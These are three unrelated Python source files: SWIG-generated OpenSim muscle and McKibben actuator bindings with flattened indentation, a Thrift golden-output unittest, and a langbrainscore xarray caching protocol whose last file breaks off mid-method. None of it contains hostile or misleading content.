return _actuators.Millard2012AccelerationMuscle_upd_fiber_compressive_force_cos_pennation_damping(self, *args)
def set_fiber_compressive_force_cos_pennation_damping(self, *args):
"""
set_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_fiber_compressive_force_cos_pennation_damping(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_fiber_compressive_force_cos_pennation_damping(self, *args)
def copyProperty_tendon_force_length_damping(self, source):
"""
copyProperty_tendon_force_length_damping(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_tendon_force_length_damping(self, source)
def append_tendon_force_length_damping(self, value):
"""
append_tendon_force_length_damping(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_tendon_force_length_damping(self, value)
def constructProperty_tendon_force_length_damping(self, initValue):
"""
constructProperty_tendon_force_length_damping(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_tendon_force_length_damping(self, initValue)
def get_tendon_force_length_damping(self, *args):
"""
get_tendon_force_length_damping(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_tendon_force_length_damping(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_tendon_force_length_damping(self, *args)
def upd_tendon_force_length_damping(self, *args):
"""
upd_tendon_force_length_damping(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_tendon_force_length_damping(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_tendon_force_length_damping(self, *args)
def set_tendon_force_length_damping(self, *args):
"""
set_tendon_force_length_damping(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_tendon_force_length_damping(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_tendon_force_length_damping(self, *args)
def copyProperty_mass(self, source):
"""
copyProperty_mass(Millard2012AccelerationMuscle self, Millard2012AccelerationMuscle source)
Parameters
----------
source: OpenSim::Millard2012AccelerationMuscle::Self const &
"""
return _actuators.Millard2012AccelerationMuscle_copyProperty_mass(self, source)
def append_mass(self, value):
"""
append_mass(Millard2012AccelerationMuscle self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_append_mass(self, value)
def constructProperty_mass(self, initValue):
"""
constructProperty_mass(Millard2012AccelerationMuscle self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.Millard2012AccelerationMuscle_constructProperty_mass(self, initValue)
def get_mass(self, *args):
"""
get_mass(Millard2012AccelerationMuscle self, int i) -> double const
Parameters
----------
i: int
get_mass(Millard2012AccelerationMuscle self) -> double const &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_get_mass(self, *args)
def upd_mass(self, *args):
"""
upd_mass(Millard2012AccelerationMuscle self, int i) -> double
Parameters
----------
i: int
upd_mass(Millard2012AccelerationMuscle self) -> double &
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle *
"""
return _actuators.Millard2012AccelerationMuscle_upd_mass(self, *args)
def set_mass(self, *args):
"""
set_mass(Millard2012AccelerationMuscle self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_mass(Millard2012AccelerationMuscle self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.Millard2012AccelerationMuscle_set_mass(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::Millard2012AccelerationMuscle self) -> Millard2012AccelerationMuscle
__init__(OpenSim::Millard2012AccelerationMuscle self, std::string const & aName, double aMaxIsometricForce, double aOptimalFiberLength, double aTendonSlackLength, double aPennationAngle) -> Millard2012AccelerationMuscle
Parameters
----------
aName: std::string const &
aMaxIsometricForce: double
aOptimalFiberLength: double
aTendonSlackLength: double
aPennationAngle: double
"""
this = _actuators.new_Millard2012AccelerationMuscle(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
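    # Usage note (hand-written, not SWIG output): a minimal sketch of the
    # five-argument overload documented above; all numbers are illustrative
    # assumptions, not recommended values.
    #
    #     muscle = Millard2012AccelerationMuscle('soleus', # name
    #                                            3500.0,   # max isometric force (N)
    #                                            0.05,     # optimal fiber length (m)
    #                                            0.25,     # tendon slack length (m)
    #                                            0.17)     # pennation angle (rad)
    #     muscle.set_default_activation(0.05)
    #     muscle.set_mass(0.05)  # fiber mass used by the acceleration dynamics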
def getFiberCompressiveForceLengthMultiplier(self, s):
"""
getFiberCompressiveForceLengthMultiplier(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State &
"""
return _actuators.Millard2012AccelerationMuscle_getFiberCompressiveForceLengthMultiplier(self, s)
def getFiberCompressiveForceCosPennationMultiplier(self, s):
"""
getFiberCompressiveForceCosPennationMultiplier(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State &
"""
return _actuators.Millard2012AccelerationMuscle_getFiberCompressiveForceCosPennationMultiplier(self, s)
def getTendonForceMultiplier(self, s):
"""
getTendonForceMultiplier(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State &
"""
return _actuators.Millard2012AccelerationMuscle_getTendonForceMultiplier(self, s)
def getMass(self):
"""
getMass(Millard2012AccelerationMuscle self) -> double
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getMass(self)
def getActivationModel(self):
"""
getActivationModel(Millard2012AccelerationMuscle self) -> MuscleFirstOrderActivationDynamicModel
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getActivationModel(self)
def getPennationModel(self):
"""
getPennationModel(Millard2012AccelerationMuscle self) -> MuscleFixedWidthPennationModel
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getPennationModel(self)
def getActiveForceLengthCurve(self):
"""
getActiveForceLengthCurve(Millard2012AccelerationMuscle self) -> ActiveForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getActiveForceLengthCurve(self)
def getForceVelocityCurve(self):
"""
getForceVelocityCurve(Millard2012AccelerationMuscle self) -> ForceVelocityCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getForceVelocityCurve(self)
def getFiberForceLengthCurve(self):
"""
getFiberForceLengthCurve(Millard2012AccelerationMuscle self) -> FiberForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getFiberForceLengthCurve(self)
def getTendonForceLengthCurve(self):
"""
getTendonForceLengthCurve(Millard2012AccelerationMuscle self) -> TendonForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getTendonForceLengthCurve(self)
def getFiberCompressiveForceLengthCurve(self):
"""
getFiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self) -> FiberCompressiveForceLengthCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getFiberCompressiveForceLengthCurve(self)
def getFiberCompressiveForceCosPennationCurve(self):
"""
getFiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self) -> FiberCompressiveForceCosPennationCurve
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getFiberCompressiveForceCosPennationCurve(self)
def getFiberStiffnessAlongTendon(self, s):
"""
getFiberStiffnessAlongTendon(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.Millard2012AccelerationMuscle_getFiberStiffnessAlongTendon(self, s)
def setActivationModel(self, aActivationMdl):
"""
setActivationModel(Millard2012AccelerationMuscle self, MuscleFirstOrderActivationDynamicModel aActivationMdl)
Parameters
----------
aActivationMdl: OpenSim::MuscleFirstOrderActivationDynamicModel &
"""
return _actuators.Millard2012AccelerationMuscle_setActivationModel(self, aActivationMdl)
def setActiveForceLengthCurve(self, aActiveForceLengthCurve):
"""
setActiveForceLengthCurve(Millard2012AccelerationMuscle self, ActiveForceLengthCurve aActiveForceLengthCurve)
Parameters
----------
aActiveForceLengthCurve: OpenSim::ActiveForceLengthCurve &
"""
return _actuators.Millard2012AccelerationMuscle_setActiveForceLengthCurve(self, aActiveForceLengthCurve)
def setForceVelocityCurve(self, aForceVelocityCurve):
"""
setForceVelocityCurve(Millard2012AccelerationMuscle self, ForceVelocityCurve aForceVelocityCurve)
Parameters
----------
aForceVelocityCurve: OpenSim::ForceVelocityCurve &
"""
return _actuators.Millard2012AccelerationMuscle_setForceVelocityCurve(self, aForceVelocityCurve)
def setFiberForceLengthCurve(self, aFiberForceLengthCurve):
"""
setFiberForceLengthCurve(Millard2012AccelerationMuscle self, FiberForceLengthCurve aFiberForceLengthCurve)
Parameters
----------
aFiberForceLengthCurve: OpenSim::FiberForceLengthCurve &
"""
return _actuators.Millard2012AccelerationMuscle_setFiberForceLengthCurve(self, aFiberForceLengthCurve)
def setTendonForceLengthCurve(self, aTendonForceLengthCurve):
"""
setTendonForceLengthCurve(Millard2012AccelerationMuscle self, TendonForceLengthCurve aTendonForceLengthCurve)
Parameters
----------
aTendonForceLengthCurve: OpenSim::TendonForceLengthCurve &
"""
return _actuators.Millard2012AccelerationMuscle_setTendonForceLengthCurve(self, aTendonForceLengthCurve)
def setFiberCompressiveForceLengthCurve(self, aFiberCompressiveForceLengthCurve):
"""
setFiberCompressiveForceLengthCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceLengthCurve aFiberCompressiveForceLengthCurve)
Parameters
----------
aFiberCompressiveForceLengthCurve: OpenSim::FiberCompressiveForceLengthCurve &
"""
return _actuators.Millard2012AccelerationMuscle_setFiberCompressiveForceLengthCurve(self, aFiberCompressiveForceLengthCurve)
def setFiberCompressiveForceCosPennationCurve(self, aFiberCompressiveForceCosPennationCurve):
"""
setFiberCompressiveForceCosPennationCurve(Millard2012AccelerationMuscle self, FiberCompressiveForceCosPennationCurve aFiberCompressiveForceCosPennationCurve)
Parameters
----------
aFiberCompressiveForceCosPennationCurve: OpenSim::FiberCompressiveForceCosPennationCurve &
"""
return _actuators.Millard2012AccelerationMuscle_setFiberCompressiveForceCosPennationCurve(self, aFiberCompressiveForceCosPennationCurve)
def setMass(self, mass):
"""
setMass(Millard2012AccelerationMuscle self, double mass)
Parameters
----------
mass: double
"""
return _actuators.Millard2012AccelerationMuscle_setMass(self, mass)
def getDefaultActivation(self):
"""
getDefaultActivation(Millard2012AccelerationMuscle self) -> double
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getDefaultActivation(self)
def getDefaultFiberLength(self):
"""
getDefaultFiberLength(Millard2012AccelerationMuscle self) -> double
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getDefaultFiberLength(self)
def getDefaultFiberVelocity(self):
"""
getDefaultFiberVelocity(Millard2012AccelerationMuscle self) -> double
Parameters
----------
self: OpenSim::Millard2012AccelerationMuscle const *
"""
return _actuators.Millard2012AccelerationMuscle_getDefaultFiberVelocity(self)
def getActivationRate(self, s):
"""
getActivationRate(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.Millard2012AccelerationMuscle_getActivationRate(self, s)
def getFiberVelocity(self, s):
"""
getFiberVelocity(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.Millard2012AccelerationMuscle_getFiberVelocity(self, s)
def getFiberAcceleration(self, s):
"""
getFiberAcceleration(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.Millard2012AccelerationMuscle_getFiberAcceleration(self, s)
def setDefaultActivation(self, activation):
"""
setDefaultActivation(Millard2012AccelerationMuscle self, double activation)
Parameters
----------
activation: double
"""
return _actuators.Millard2012AccelerationMuscle_setDefaultActivation(self, activation)
def setDefaultFiberLength(self, fiberLength):
"""
setDefaultFiberLength(Millard2012AccelerationMuscle self, double fiberLength)
Parameters
----------
fiberLength: double
"""
return _actuators.Millard2012AccelerationMuscle_setDefaultFiberLength(self, fiberLength)
def setDefaultFiberVelocity(self, fiberVelocity):
"""
setDefaultFiberVelocity(Millard2012AccelerationMuscle self, double fiberVelocity)
Parameters
----------
fiberVelocity: double
"""
return _actuators.Millard2012AccelerationMuscle_setDefaultFiberVelocity(self, fiberVelocity)
def setActivation(self, s, activation):
"""
setActivation(Millard2012AccelerationMuscle self, State s, double activation)
Parameters
----------
s: SimTK::State &
activation: double
"""
return _actuators.Millard2012AccelerationMuscle_setActivation(self, s, activation)
def setFiberLength(self, s, fiberLength):
"""
setFiberLength(Millard2012AccelerationMuscle self, State s, double fiberLength)
Parameters
----------
s: SimTK::State &
fiberLength: double
"""
return _actuators.Millard2012AccelerationMuscle_setFiberLength(self, s, fiberLength)
def setFiberVelocity(self, s, fiberVelocity):
"""
setFiberVelocity(Millard2012AccelerationMuscle self, State s, double fiberVelocity)
Parameters
----------
s: SimTK::State &
fiberVelocity: double
"""
return _actuators.Millard2012AccelerationMuscle_setFiberVelocity(self, s, fiberVelocity)
def computeActuation(self, s):
"""
computeActuation(Millard2012AccelerationMuscle self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.Millard2012AccelerationMuscle_computeActuation(self, s)
def computeInitialFiberEquilibrium(self, s):
"""
computeInitialFiberEquilibrium(Millard2012AccelerationMuscle self, State s)
Parameters
----------
s: SimTK::State &
"""
return _actuators.Millard2012AccelerationMuscle_computeInitialFiberEquilibrium(self, s)
def calcInextensibleTendonActiveFiberForce(self, s, aActivation):
"""
calcInextensibleTendonActiveFiberForce(Millard2012AccelerationMuscle self, State s, double aActivation) -> double
Parameters
----------
s: SimTK::State &
aActivation: double
"""
return _actuators.Millard2012AccelerationMuscle_calcInextensibleTendonActiveFiberForce(self, s, aActivation)
def calcActiveFiberForceAlongTendon(self, activation, fiberLength, fiberVelocity):
"""
calcActiveFiberForceAlongTendon(Millard2012AccelerationMuscle self, double activation, double fiberLength, double fiberVelocity) -> double
Parameters
----------
activation: double
fiberLength: double
fiberVelocity: double
"""
return _actuators.Millard2012AccelerationMuscle_calcActiveFiberForceAlongTendon(self, activation, fiberLength, fiberVelocity)
def extendPostScale(self, s, scaleSet):
"""
extendPostScale(Millard2012AccelerationMuscle self, State s, ScaleSet scaleSet)
Parameters
----------
s: SimTK::State const &
scaleSet: OpenSim::ScaleSet const &
"""
return _actuators.Millard2012AccelerationMuscle_extendPostScale(self, s, scaleSet)
__swig_destroy__ = _actuators.delete_Millard2012AccelerationMuscle
__del__ = lambda self: None
Millard2012AccelerationMuscle_swigregister = _actuators.Millard2012AccelerationMuscle_swigregister
Millard2012AccelerationMuscle_swigregister(Millard2012AccelerationMuscle)
def Millard2012AccelerationMuscle_safeDownCast(obj):
"""
Millard2012AccelerationMuscle_safeDownCast(OpenSimObject obj) -> Millard2012AccelerationMuscle
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.Millard2012AccelerationMuscle_safeDownCast(obj)
def Millard2012AccelerationMuscle_getClassName():
"""Millard2012AccelerationMuscle_getClassName() -> std::string const &"""
return _actuators.Millard2012AccelerationMuscle_getClassName()
class McKibbenActuator(opensim.simulation.PathActuator):
"""Proxy of C++ OpenSim::McKibbenActuator class."""
__swig_setmethods__ = {}
for _s in [opensim.simulation.PathActuator]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, McKibbenActuator, name, value)
__swig_getmethods__ = {}
for _s in [opensim.simulation.PathActuator]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, McKibbenActuator, name)
__repr__ = _swig_repr
def safeDownCast(obj):
"""
safeDownCast(OpenSimObject obj) -> McKibbenActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.McKibbenActuator_safeDownCast(obj)
safeDownCast = staticmethod(safeDownCast)
def assign(self, aObject):
"""
assign(McKibbenActuator self, OpenSimObject aObject)
Parameters
----------
aObject: OpenSim::Object &
"""
return _actuators.McKibbenActuator_assign(self, aObject)
def getClassName():
"""getClassName() -> std::string const &"""
return _actuators.McKibbenActuator_getClassName()
getClassName = staticmethod(getClassName)
def clone(self):
"""
clone(McKibbenActuator self) -> McKibbenActuator
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_clone(self)
def getConcreteClassName(self):
"""
getConcreteClassName(McKibbenActuator self) -> std::string const &
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_getConcreteClassName(self)
def copyProperty_thread_length(self, source):
"""
copyProperty_thread_length(McKibbenActuator self, McKibbenActuator source)
Parameters
----------
source: OpenSim::McKibbenActuator::Self const &
"""
return _actuators.McKibbenActuator_copyProperty_thread_length(self, source)
def append_thread_length(self, value):
"""
append_thread_length(McKibbenActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.McKibbenActuator_append_thread_length(self, value)
def constructProperty_thread_length(self, initValue):
"""
constructProperty_thread_length(McKibbenActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.McKibbenActuator_constructProperty_thread_length(self, initValue)
def get_thread_length(self, *args):
"""
get_thread_length(McKibbenActuator self, int i) -> double const
Parameters
----------
i: int
get_thread_length(McKibbenActuator self) -> double const &
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_get_thread_length(self, *args)
def upd_thread_length(self, *args):
"""
upd_thread_length(McKibbenActuator self, int i) -> double
Parameters
----------
i: int
upd_thread_length(McKibbenActuator self) -> double &
Parameters
----------
self: OpenSim::McKibbenActuator *
"""
return _actuators.McKibbenActuator_upd_thread_length(self, *args)
def set_thread_length(self, *args):
"""
set_thread_length(McKibbenActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_thread_length(McKibbenActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.McKibbenActuator_set_thread_length(self, *args)
def copyProperty_number_of_turns(self, source):
"""
copyProperty_number_of_turns(McKibbenActuator self, McKibbenActuator source)
Parameters
----------
source: OpenSim::McKibbenActuator::Self const &
"""
return _actuators.McKibbenActuator_copyProperty_number_of_turns(self, source)
def append_number_of_turns(self, value):
"""
append_number_of_turns(McKibbenActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.McKibbenActuator_append_number_of_turns(self, value)
def constructProperty_number_of_turns(self, initValue):
"""
constructProperty_number_of_turns(McKibbenActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.McKibbenActuator_constructProperty_number_of_turns(self, initValue)
def get_number_of_turns(self, *args):
"""
get_number_of_turns(McKibbenActuator self, int i) -> double const
Parameters
----------
i: int
get_number_of_turns(McKibbenActuator self) -> double const &
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_get_number_of_turns(self, *args)
def upd_number_of_turns(self, *args):
"""
upd_number_of_turns(McKibbenActuator self, int i) -> double
Parameters
----------
i: int
upd_number_of_turns(McKibbenActuator self) -> double &
Parameters
----------
self: OpenSim::McKibbenActuator *
"""
return _actuators.McKibbenActuator_upd_number_of_turns(self, *args)
def set_number_of_turns(self, *args):
"""
set_number_of_turns(McKibbenActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_number_of_turns(McKibbenActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.McKibbenActuator_set_number_of_turns(self, *args)
def copyProperty_cord_length(self, source):
"""
copyProperty_cord_length(McKibbenActuator self, McKibbenActuator source)
Parameters
----------
source: OpenSim::McKibbenActuator::Self const &
"""
return _actuators.McKibbenActuator_copyProperty_cord_length(self, source)
def append_cord_length(self, value):
"""
append_cord_length(McKibbenActuator self, double const & value) -> int
Parameters
----------
value: double const &
"""
return _actuators.McKibbenActuator_append_cord_length(self, value)
def constructProperty_cord_length(self, initValue):
"""
constructProperty_cord_length(McKibbenActuator self, double const & initValue)
Parameters
----------
initValue: double const &
"""
return _actuators.McKibbenActuator_constructProperty_cord_length(self, initValue)
def get_cord_length(self, *args):
"""
get_cord_length(McKibbenActuator self, int i) -> double const
Parameters
----------
i: int
get_cord_length(McKibbenActuator self) -> double const &
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_get_cord_length(self, *args)
def upd_cord_length(self, *args):
"""
upd_cord_length(McKibbenActuator self, int i) -> double
Parameters
----------
i: int
upd_cord_length(McKibbenActuator self) -> double &
Parameters
----------
self: OpenSim::McKibbenActuator *
"""
return _actuators.McKibbenActuator_upd_cord_length(self, *args)
def set_cord_length(self, *args):
"""
set_cord_length(McKibbenActuator self, int i, double const & value)
Parameters
----------
i: int
value: double const &
set_cord_length(McKibbenActuator self, double const & value)
Parameters
----------
value: double const &
"""
return _actuators.McKibbenActuator_set_cord_length(self, *args)
def __init__(self, *args):
"""
__init__(OpenSim::McKibbenActuator self) -> McKibbenActuator
__init__(OpenSim::McKibbenActuator self, std::string const & name, double num_turns, double thread_length) -> McKibbenActuator
Parameters
----------
name: std::string const &
num_turns: double
thread_length: double
"""
this = _actuators.new_McKibbenActuator(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def setNumberOfTurns(self, val):
"""
setNumberOfTurns(McKibbenActuator self, double val)
Parameters
----------
val: double
"""
return _actuators.McKibbenActuator_setNumberOfTurns(self, val)
def getNumberOfTurns(self):
"""
getNumberOfTurns(McKibbenActuator self) -> double
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_getNumberOfTurns(self)
def setThreadLength(self, val):
"""
setThreadLength(McKibbenActuator self, double val)
Parameters
----------
val: double
"""
return _actuators.McKibbenActuator_setThreadLength(self, val)
def getThreadLength(self):
"""
getThreadLength(McKibbenActuator self) -> double
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_getThreadLength(self)
def setCordLength(self, val):
"""
setCordLength(McKibbenActuator self, double val)
Parameters
----------
val: double
"""
return _actuators.McKibbenActuator_setCordLength(self, val)
def getCordLength(self):
"""
getCordLength(McKibbenActuator self) -> double
Parameters
----------
self: OpenSim::McKibbenActuator const *
"""
return _actuators.McKibbenActuator_getCordLength(self)
def computeActuation(self, s):
"""
computeActuation(McKibbenActuator self, State s) -> double
Parameters
----------
s: SimTK::State const &
"""
return _actuators.McKibbenActuator_computeActuation(self, s)
__swig_destroy__ = _actuators.delete_McKibbenActuator
__del__ = lambda self: None
McKibbenActuator_swigregister = _actuators.McKibbenActuator_swigregister
McKibbenActuator_swigregister(McKibbenActuator)
def McKibbenActuator_safeDownCast(obj):
"""
McKibbenActuator_safeDownCast(OpenSimObject obj) -> McKibbenActuator
Parameters
----------
obj: OpenSim::Object *
"""
return _actuators.McKibbenActuator_safeDownCast(obj)
def McKibbenActuator_getClassName():
"""McKibbenActuator_getClassName() -> std::string const &"""
return _actuators.McKibbenActuator_getClassName()
# This file is compatible with both classic and new-style classes.
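# --- Usage sketch (illustrative, not part of the generated bindings) ---
# A minimal, hedged example of driving the McKibbenActuator wrapper above;
# it assumes a working OpenSim Python installation, and the constructor
# signature follows the SWIG docstring: __init__(name, num_turns, thread_length).
if __name__ == '__main__':
    actuator = McKibbenActuator('mckibben', 1.5, 0.55)
    actuator.setCordLength(0.1)
    print(actuator.getNumberOfTurns(), actuator.getThreadLength(), actuator.getCordLength())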
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import difflib
import os
import shutil
import sys
import tempfile
import traceback
import unittest
from thrift.test.testset import generator
golden_root_dir = os.getenv("THRIFT_GOLDEN_DIR")
def read_file(path):
with open(path, "r") as f:
return f.read()
def gen_find_recursive_files(path):
for root, _, files in os.walk(path):
for f in files:
yield os.path.relpath(os.path.join(root, f), path)
class GoldenTest(unittest.TestCase):
MSG = """One or more testset outputs are out of sync with the generator.
To sync them, run:
thrift/test/testset/generator.py --install_dir ./thrift/test/testset/golden
"""
def compare_code(self, path1, path2):
gens = list(gen_find_recursive_files(path1))
fixt = list(gen_find_recursive_files(path2))
try:
            # Compare that the lists of generated file paths are the same
self.assertEqual(sorted(gens), sorted(fixt))
for gen in gens:
geng_path = os.path.join(path1, gen)
genf_path = os.path.join(path2, gen)
geng = read_file(geng_path)
genf = read_file(genf_path)
if geng == genf:
continue
msg = ["Difference found in " + gen + ":"]
for line in difflib.unified_diff(
geng.splitlines(),
genf.splitlines(),
geng_path,
genf_path,
lineterm="",
):
msg.append(line)
self.fail("\n".join(msg))
except Exception:
print(self.MSG, file=sys.stderr)
traceback.print_exc(file=sys.stderr)
raise
def setUp(self):
tmp = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmp, True)
self.tmp = tmp
self.maxDiff = None
def testGolden(self):
generator.generate(self.tmp)
# Compare generated to golden.
self.compare_code(golden_root_dir, self.tmp)
if __name__ == "__main__":
unittest.main()
|
import pickle
import typing
from abc import ABC, abstractclassmethod, abstractmethod
from numbers import Number
from pathlib import Path
import xarray as xr
import numpy as np
import yaml
from langbrainscore.utils.cache import get_cache_directory, pathify
from langbrainscore.utils.logging import log
T = typing.TypeVar("T")
@typing.runtime_checkable
class _Cacheable(typing.Protocol):
"""
A class used to define a common interface for Object caching in LangBrainscore
"""
def __eq__(o1: "_Cacheable", o2: "_Cacheable") -> bool:
def checkattr(key) -> bool:
"""helper function to check if an attribute is the same between two objects
and handles AttributeError while at it. if the attributes differ (or does
not exist on one or the other object), returns False.
"""
try:
if getattr(o1, key) != getattr(o2, key):
return False
except AttributeError:
return False
return True
for key, ob in vars(o1).items():
if isinstance(ob, (str, Number, bool, _Cacheable, tuple, type(None))):
if not checkattr(key):
log(f"{o1} and {o2} differ on {key}", cmap="ERR")
return False
elif isinstance(ob, xr.DataArray):
x1 = getattr(o1, key)
x2 = getattr(o2, key)
if (not np.allclose(x1.data, x2.data, equal_nan=True, atol=1e-4)) or (
x1.attrs != x2.attrs
):
log(f"{o1} and {o2} differ on {key}", cmap="ERR")
return False
else:
return True
# @abstractclassmethod
# @classmethod
def _get_xarray_objects(self) -> typing.Iterable[str]:
"""
returns the *names* of all attributes of self that are instances of xarray
NOTE: this method should be implemented by any subclass irrespective of instance
state so that in the future we can support loading from cache without having
to re-run the pipeline (and thereby assign attributes as appropriate)
by default, just goes over all the objects and returns their names if they are instances
of `xr.DataArray`
"""
keys = []
for key, ob in vars(self).items():
if isinstance(ob, xr.DataArray):
keys += [key]
return keys
def __repr__(self) -> str:
"""
default, broad implementation to support our use case.
constructs a string by concatenating all str, numeric, boolean
attributes of self, as well as all the representations of Cacheable
instances that are attributes of self.
"""
sep = "#"
rep = f"<{self.__class__.__name__}"
for key in sorted(vars(self)):
ob = getattr(self, key)
if isinstance(ob, (str, Number, bool, _Cacheable, tuple, type(None))):
# if isinstance(ob, (str, Number, bool, _Cacheable, tuple)):
if isinstance(ob, _Cacheable):
rep += f"{sep}{key}={ob.identifier_string}"
else:
rep += f"{sep}{key}={ob}"
return rep + ">"
@property
def identifier_string(self):
"""
This property aims to return an unambiguous representation of this _Cacheable
instance, complete with all scalar parameters used to initialize it, and any
_Cacheable instances that are attributes of this object.
Unless overridden, makes a call to `repr`
"""
return repr(self)
def to_cache(
self,
identifier_string: str = None,
overwrite=True,
cache_dir=None,
xarray_serialization_backend="to_zarr",
) -> Path:
"""
dump this object to cache. this method implementation will serve
as the default implementation. it is recommended that this be left
as-is for compatibility with caching across the library.
Args:
identifier_string (str): a unique identifier string to identify this cache
instance by (optional; by default, the .identifier_string property is used)
overwrite (bool): whether to overwrite existing cache by the same identity,
if it exists. if False, an exce
"""
if cache_dir:
cache = get_cache_directory(
cache_dir, calling_class=self.__class__.__name__
)
else:
cache = get_cache_directory(calling_class=self.__class__.__name__)
root, subdir = cache.root, cache.subdir
# now we use "subdir" to be our working directory to dump this cache object
subdir /= identifier_string or self.identifier_string
subdir.mkdir(parents=True, exist_ok=overwrite)
log(f"caching {self} to {subdir}")
with (subdir / "xarray_object_names.yml").open("w") as f:
yaml.dump(self._get_xarray_objects(), f, yaml.SafeDumper)
with (subdir / "id.txt").open("w") as f:
f.write(self.identifier_string)
kwargs = {}
if overwrite and "zarr" in xarray_serialization_backend:
kwargs.update({"mode": "w"})
for ob_name in self._get_xarray_objects():
ob = getattr(self, ob_name)
tgt_dir = subdir / (ob_name + ".xr")
dump_object_fn = getattr(
